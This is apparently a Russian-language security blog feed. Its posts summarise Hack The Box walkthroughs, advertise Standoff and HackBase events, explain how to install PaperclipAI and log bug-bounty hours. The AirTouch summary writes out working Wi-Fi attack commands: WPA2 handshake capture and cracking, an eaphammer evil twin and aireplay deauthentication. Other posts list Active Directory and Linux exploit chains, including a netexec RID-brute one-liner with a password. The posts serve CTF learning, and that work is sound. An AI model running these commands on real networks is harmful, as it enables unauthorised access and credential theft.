Bagley's 📚 Notes

💬 Еще вчера заходил в свой 💚 профиль, полюбоваться на надпись "Pro Hacker", а сегодня вижу какие-то Level'ы, Rank'и и Grade'ы #️⃣ Hack The Box ввёл единую систему прогресса HTB 🌡, которая учитывает все ваши активности на платформе и превращает их в один общий показатель, влияющий на ранг. То есть теперь, если проходишь обучающие модули в Academy, сдаешь сертификаты, решаешь тачки в Labs - получаешь опыт, который никогда не сгорает и отображается в профиле. 💬 В старом профиле (который у меня был наверное года с 2019) красуется надпись "Guru", но теперь это просто приятное воспоминание о прошлых заслугах... (не спрашивайте зачем я сделал второй аккаунт - не знаю 🫤)

Закрываю 💚 Season 10: Underground с ⭐ Holo ⭐ P.S. Повезло, что в этом сезоне была только одна Insane тачка, и та последняя (Holo можно взять решив 12 из 13 тачек) P.P.S. На Insane натравлю ИИ

☀️Представь обычное утро. 😎Ты просыпаешься, берёшь телефон - и уже в первые 5 минут оставляешь десятки цифровых следов. Банки, мессенджеры, почта, рабочие сервисы. Всё работает. Всё удобно. Всё… уязвимо... 🤔И вот в какой-то момент приходит осознание: информационная безопасность - это давно не про «айтишников где-то там».

✋Это про тебя. Про твои деньги, переписки, доступы. Про бизнес. Про репутацию. Про страну, в конце концов.

 Самое интересное большинство людей не игнорируют безопасность. Они просто не знают, с чего начать. 💰И тут начинается самое ценное. Не курсы за сотни тысяч. Не скучные документы на 200 страниц. А люди. 🙂Живые эксперты, которые каждый день разбирают реальные атаки, объясняют сложные вещи на пальцах и показывают, как думать, а не просто что делать. 👥Мы как раз собрали таких в одном месте. Разных - по стилю, опыту, подаче. Но одинаково сильных. 📰Тех, кого читают, чтобы: - не словить банальный фишинг — понять, как реально ломают компании — собрать у себя в голове систему, а не набор хаотичных советов — и, если честно, немного прокачать профессиональную интуицию Ты можешь наткнуться на них случайно. А можешь сразу зайти в нужную среду. Туда, где формируется новое поколение людей в ИБ.

👉 Просто посмотри подборку — и сам(-а) поймёшь, о чём речь.

Иногда один правильно выбранный канал меняет отношение к безопасности сильнее, чем год работы «на авось». ✋Вопрос только в том, когда ты решишь зайти.

🆕 Новый видео-разбор тачки 💚 (HackTheBox) от ippsec'a ⁉️ Стартуем с утечки пароля через SNMP и подключаемся по SSH в контейнер с виртуальными Wi‑Fi интерфейсами ➡️ перехватываем и брутим WPA2‑PSK хэндшейк, подключаемся к сети планшетов и расшифровываем трафик в Wireshark, вытаскивая сессионные куки панели роутера ➡️ в вебке роутера меняем role‑cookie на клиенте и получаем админский аплоад, обходя фильтр по расширениям через .phtml для RCE ➡️ находим в исходниках жестко захардкоженные креды, которые позволяют имперсонироваться в другого юзера ➡️ через sudo добираемся до root на первом хосте и вытаскиваем CA/серверные сертификаты корпоративной Wi‑Fi сети ➡️ с помощью eaphammer поднимаем evil twin точки доступа AirTouch‑Office, ловим PEAP‑MSCHAPv2‑челлендж и брутим его до пароля пользователя ➡️ попадаем в корпоративную сеть и через hostapd eap_user конфиг утаскиваем пароль админа, после чего через sudo окончательно закрепляемся как root #️⃣Дефолтные команды при работе с беспроводным интерфейсом:

ip link set wlan0 up
iwlist wlan0 scan
iwlist wlan0 scan | grep -e ESSID -e Frequency -e Address

#️⃣Ловим WPA2‑PSK хэндшейк и брутим его:

airmon-ng start wlan0
airodump-ng wlan0mon
airodump-ng wlan0mon --channel 6 --bssid F0:9F:C2:A3:F1:A7 -w /tmp/airtouch_capture
aircrack-ng -w /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt  ./airtouch_capture-01.cap

#️⃣ Генерим конфиг (wpa_passphrase) для подключения к Wi-Fi (wpa_supplicant тулза)

wpa_passphrase AirTouch-Internet 'challenge' > /tmp/airtouch-internet.conf

cat /tmp/airtouch-internet.conf
network={
        ssid="AirTouch-Internet"
        #psk="challenge"
        psk=d1ff702dcb1182eec9e189e1693555a007dc1b21be358e02b87574497dcf017e
}

wpa_supplicant -B -i wlan2 -c /tmp/airtouch-internet.conf
ip addr show wlan2
dhclient -v wlan2

#️⃣ Атака "Evil twin":

# Импорт сертов
./eaphammer --cert-wizard import --server-cert /home/consultant/server.crt --ca-cert /home/consultant/ca.crt --private-key /home/consultant/server.key 

# Поднимаем точку и ловим коннекты
./eaphammer -i wlan4 --auth wpa-eap --essid AirTouch-Office

# В Другом терминале проводим деаутентификацию пользователей, чтоб они к нашему "двойнику" законнектились
iw dev wlan5 set type monitor
ip link set wlan5 up
iw dev wlan5 set channel 44
aireplay-ng -0 10 -a AC:8B:A9:AA:3F:D2 wlan5; aireplay-ng -0 10 -a AC:8B:A9:F3:A1:13 wlan5

#️⃣ Пример конфига для подключения к сети WPA‑Enterprise с PEAP‑MSCHAPv2

network={
    ssid="AirTouch-Office"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="AirTouch\r4ulcl"
    password="laboratory"
    phase2="auth=MSCHAPV2"
}

wpa_supplicant -i wlan6 -c ./airtouch-office.conf

💬 Первая в своём роде (тачка с Wi-Fi) и бесконечно крутая! #️⃣Сегодня это Linux box - AirTouch, уровень сложности Medium #️⃣ А вот еще разбор от крутого чела - 0xdf 🌹 Основные посты канала 📲 max #video #HTB #ippsec #0xdf #Walkthroughs

13.03.2026 - 13.04.2026 🕵️‍♀️ Hunting : 7 (29) hours 📚 Studying : 4 (32) hours 🐞 Bug Reported : ✅ (Что уже было: "Вне скоупа", "Информатив", "Low" 😢 Пока что очень сложно выделять время на это, но буду него находить и выделять 👍)

Юбилейная кибербитва Standoff 😼 В этом году нашей кибербитве исполняется 10 лет. За это время Standoff вырос в одну из крупнейших мировых площадок, где белые хакеры проверяют кибербез не на бумаге, а в реальном бою. С 2016 года в битве приняли участие более 7500 экспертов со всего мира, а свыше 500 компаний прокачали киберустойчивость, отточив навыки своих команд. Следующая кибербитва — Standoff 17 — пройдет с 16 по 19 июня в Кибердоме. И мы хотим сделать ее по-настоящему легендарной. Вот что ждет участников: ⌨️ Киберсражение развернется в виртуальном Государстве F — на киберполигоне с инфраструктурой разных отраслей: от энергетики и железнодорожного транспорта до телекома и банков. ⌨️ Максимум реализма: будут воссозданы настоящие процессы и технологии, включая ПЛК и SCADA. ⌨️ Атаковать их будут 25 красных команд из Вьетнама, Индонезии, Монголии, Китая, Нидерландов, Узбекистана и России. ⌨️ Сильнейшие команды атакующих разделят призовой фонд в 50 000 $. Им предстоит реализовать более 70 критических событий — от получения доступа к системам до нарушения бизнес-процессов. ⌨️ Защитники — команды российских специалистов по ИБ — будут в реальном времени выявлять, разбирать инциденты и реагировать на атаки. 👀 И главное — вы сможете увидеть все своими глазами. Доклады про кибериспытания, цифровые копии систем и нейронки, а также мастер-классы и конкурсы по кибербезу — все это будет доступно гостям кибербитвы. Как попасть — скоро расскажем 🔜 #Standoff @Positive_Technologies

Всем 👋! Это Bagley 💬 Слишком быстро развиваются технологии, особенно в сфере ИИ. Начинаешь погружаться в тему, и просто пропадаешь в потоке информации, новостей, технологий, и т.п. Сейчас сложно держаться от этой темы в стороне. Можно не пользоваться. Можно хейтить. Можно игнорировать. Но отрицать то, что он уже меняет правила игры - не получится. 💬 Чуть-чуть поигрался с агентами AI, и задался вопросом: Как управлять своими платными подписками из одного места? А еще что бы агенты между собой взаимодействовали и решали конкретную задачу? PaperclipAI - это не агент, а целая ИИ-компания. Open-source, MIT-лицензия, быстро набирает популярность на GitHub. #️⃣ Основная идея: Paperclip - менеджерский слой (Node.js + PostgreSQL) над агентами вроде Claude Code, OpenClaw, Codex. Ты = CEO/совет директоров. Задаёшь глобальную миссию ➡️ система строит дерево задач (миссия ➡️ проект ➡️ агент ➡️ тикет), назначает роли/бюджеты. #️⃣ Основные фичи: - Heartbeat-расписание: Агенты "спят", просыпаются (каждые 4ч), берут задачу, блокируют её атомарно, отчитываются. - Дерево контекста: Агент видит не "напиши WebSocket", а цепочку от бизнес-цели. - Заявлены бюджеты и governance (пока базово): Лимиты на токены, аппрув больших решений. - Дашборд: Org-chart, тикеты, метрики в React UI. OpenClaw = сотрудник. Claude = сотрудник. Codex = сотрудник. Paperclip = твоя компания😳 #️⃣ Быстрый старт: 🔴 Зависимости:

sudo apt install npm
npm install -g pnpm

🔴 Автоматическая установка:

npx paperclipai onboard --yes

🔴 С исходников:

git clone https://github.com/paperclipai/paperclip.git
cd paperclip
pnpm install
pnpm dev

поле установки заходи на http://localhost:3100 и развлекайся 💬Проблем пока тоже достаточно, перечислю малую их часть: 🍔 Токенов жрёт быстро и много 👎 Не волшебная палочка: нужна хорошая настройка агентов, ролей, целей и т.п. 🧂 Нельзя из коробки удобно назначать разные OpenAI аккаунты разным агентам (пока нужны костыли с env переменными) ⚙️ На данный момент Paperclip - "крутой экспериментальный фреймворк", а не готовая платформа. Но продукт развивается, и в целом может перерасти в довольно-таки серьёзный комбайн. 🌹 Основные посты канала 📲 max

🆕 Новый видео-разбор тачки 💚 (HackTheBox) от ippsec'a ⁉️ Подключаемся к MSSQL с выданными кредами, impersonate в appdev ➡️ достаём Werkzeug PBKDF2-HMAC-SHA256 хэш админа веб-приложения (hashcat mode 10900) ➡️ RID cycling через MSSQL (nxc), enum доменных юзеров, password spray (WinRM с юзером из IT group) ➡️ эксплуатируем CVE-2025-53779 "Bad Successor" (вредоносный dMSA в Staff OU с msDS-ManagedAccountPrecededByLink, KDC выдаёт TGT с группами Domain Admin) ➡️ дампим NTDS

netexec mssql eighteen.htb -u kevin -p 'iNa2we6haRj2gaw!' --local-auth --rid-brute | grep -oP 'EIGHTEEN\\\w+\.\w+' | cut -d '\' -f2 | tee users

#️⃣Сегодня это Windows box - Eighteen, уровень сложности Easy #️⃣ А вот еще разбор от крутого чела - 0xdf 🌹 Основные посты канала 📲 max #video #HTB #ippsec #0xdf #Walkthroughs

🆕 Новый видео-разбор тачки 💚 (HackTheBox) от ippsec'a ⁉️ MSSQL на DC01 с залинкованным сервером до DC02 (sysadmin права) ➡️ xp_cmdshell на DC02 - шелл от svc_sql ➡️System на DC02: ➡️ История с восстановлением SeImpersonatePrivilege прав, именованными пайпами и (GodPotato) ➡️ ADCS-энролмент сертификата (Certipy) → дамп NT-хэша → смена пароля → RunAsCS с правами сервиса (токен с включенным SeImpersonatePrivilege) → GodPotato ➡️NTLM Reflection через CMTI DNS-запись DC021UWhRC...YBAAAA (relay machine account → LDAPS) ➡️CVE-2024-30088 (msf exploit(windows/local/cve_2024_30088_authz_basep) ➡️Захватываем TGT dc01 через cross-forest TGT delegation, дампим хэши, забираем root.txt #️⃣Сегодня это Windows box - DarkZero, уровень сложности Hard #️⃣ А вот еще разбор от крутого чела - 0xdf 🌹 Основные посты канала 📲 max #video #HTB #ippsec #0xdf #Walkthroughs

💣 HackBase - Season 2 💣 5️⃣ SCADA систем ждут тебя!

💣 HackBase - Season 2 💣 5️⃣ SCADA систем ждут тебя!

🎞 Link-Digest за Март 2026: 🔵HowToBB⁉️ 🐞 Intigriti: Intigriti Bug Bytes #234 - March 2026🚀 Exploiting broken access control vulnerabilities BugQuest 2026: 31 Days of Broken Access Control Intigriti 0326 CTF Challenge: Chaining DOM clobbering and CSP bypasses for XSS 🐞 YesWeHack: Open-source security testing: the Bug Bounty guide to code analysis 🐝 HiveFive community Hive Five 264 - The Intelligence Premium Hive Five 265 - Why Your High IQ is Making You Stupid Hive Five 266 - My Grandfather's Cat Hive Five 267 - Optimize for the sun Hive Five 268 - Some Things Just Take Time 🔵HowToHack⁉️ #️⃣0xDF Walkthroughs: Linux: Medium - Principal Medium - Browsed Medium - Gavel Medium - Barrier Easy - Expressway Easy - Conversor 🌹 Основные посты канала #learning #PublicPosts

🚨Белый список по ИБ 😅 Рекомендую! 👽👽 Репост приветствуется #list #ethical ✈️ Telegram 💬 MAX

#️⃣ Новый сезон HackBase #️⃣ Новый рубеж (600к) (ну и скрин, пока не подвинули😳)

🆕 Новый видео-разбор тачки 💚 (HackTheBox) от ippsec'a ⁉️ Browsed - репозиторий Chrome-расширений, в котором загруженные расширения тестируются в headless режиме ➡️ После анализа debug-логов Chrom'а находим внутренний экземпляр Gitea и приложение на Flask ➡️ SSRF через вредоносное расширение с background service worker для доступа к внутреннему приложению ➡️bash arithmetic injection (${...} в shell-скрипте) для RCE на хост ➡️ через sudo запускается скрипт, у которого world-writable pycache директория ➡️ пишем новый Python скрипт, генерируем для него .pyc файл, получаем root #️⃣Сегодня это Linux box - Browsed, уровень сложности Medium #️⃣ А вот еще разбор от крутого чела - 0xdf 🌹 Основные посты канала 📲 max #video #HTB #ippsec #0xdf #Walkthroughs

#️⃣ Orange Cyberdefense: AD - mindmap 2025 Перевёл в формат md: Основные блоки, сслыки на инструменты, команды (если будут косяки, 📝 пишите в комменты плз) 🌹 Основные посты канала 📲 max

🆕 Новый видео-разбор тачки 💚 (HackTheBox) от ippsec'a ⁉️ Flask-приложение конвертирует nmap XML в HTML через XSLT, исходники доступны через source_code.tar.gz ➡️ в install.md инфа о кроне, запускающего все .py файлы из /scripts/ каждую минуту под www-data ➡️ небезопасный os.path.join в /convert endpoint'е позволяет записать Python reverse shell напрямую в директорию крона (path traversal) ➡️ читаем SQLite базу instance/users.db, брутим MD5-хэш пользователя fismathack = SSH-доступ ➡️ fismathack может запускать sudo needrestart без пароля = CVE-2024-48990 (PYTHONPATH poisoning: подменяем importlib/__init__.py) или needrestart -c с Perl-конфигом (exec "/bin/bash") = root shell #️⃣Сегодня это Linux box - Conversor, уровень сложности Easy #️⃣ А вот еще разбор от крутого чела - 0xdf 🌹 Основные посты канала 📲 max #video #HTB #ippsec #0xdf #Walkthroughs

🆕 Новый видео-разбор тачки 💚 (HackTheBox) от ippsec'a ⁉️ Эксплуатация открытого .git (git-dumper для получения исходников PHP-приложения) ➡️ SQLi байпас PDO prepared statements для дампа БД + взлом bcrypt-хэшей через hashcat ➡️RCE через PHP-расширение runkit (инъекция кода в логику валидации аукциона) ➡️ pass reuse для SSH-доступа ➡️реверс кастомного демона в Ghidra ➡️ PHP-sandbox escape через перезапись php.ini с помощью file_put_contents() для получения root'a #️⃣Сегодня это Linux box - Gavel, уровень сложности Medium #️⃣ А вот еще разбор от крутого чела - 0xdf 🌹 Основные посты канала 💬 max (на всякий случай, буду туда тоже заливать) #video #HTB #ippsec #0xdf #Walkthroughs

12.02.2026 - 12.03.2026 🕵️‍♀️ Hunting : 18 (22) hours 📚 Studying : 7 (28) hours 🐞 Bug Reported : ✅ (дубль или информ?)